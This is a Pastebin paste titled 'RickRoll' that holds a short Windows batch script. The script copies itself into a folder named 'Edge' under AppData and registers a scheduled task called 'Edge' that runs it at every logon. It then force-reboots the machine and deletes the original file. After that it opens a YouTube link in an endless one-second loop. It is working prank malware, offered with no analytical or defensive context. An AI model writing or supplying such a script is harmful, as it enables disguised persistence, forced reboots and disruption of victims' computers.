rc-chuah

RickRoll

Jun 11th, 2022 (edited)
1,111
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.46 KB | None | 0 0
  1. @echo off
  2. set url="https://www.youtube.com/watch?v=dQw4w9WgXcQ"
  3. if exist "%APPDATA%\Edge\%~n0%~x0" (
  4.     :main
  5.     start "" %url% > nul 2>&1
  6.     timeout 1 > nul 2>&1
  7.     goto main
  8. ) else (
  9.     mkdir "%APPDATA%\Edge" > nul 2>&1
  10.     copy /y %~f0 "%APPDATA%\Edge" > nul 2>&1
  11.     schtasks /create /sc onlogon /tn "Edge" /tr "%APPDATA%\Edge\%~n0%~x0" > nul 2>&1
  12.     shutdown /r /t 0 /f > nul 2>&1
  13.     start /b "" cmd /c del /q /f "%~f0" > nul 2>&1 && exit /b
  14. )
Add Comment
Please, Sign In to add comment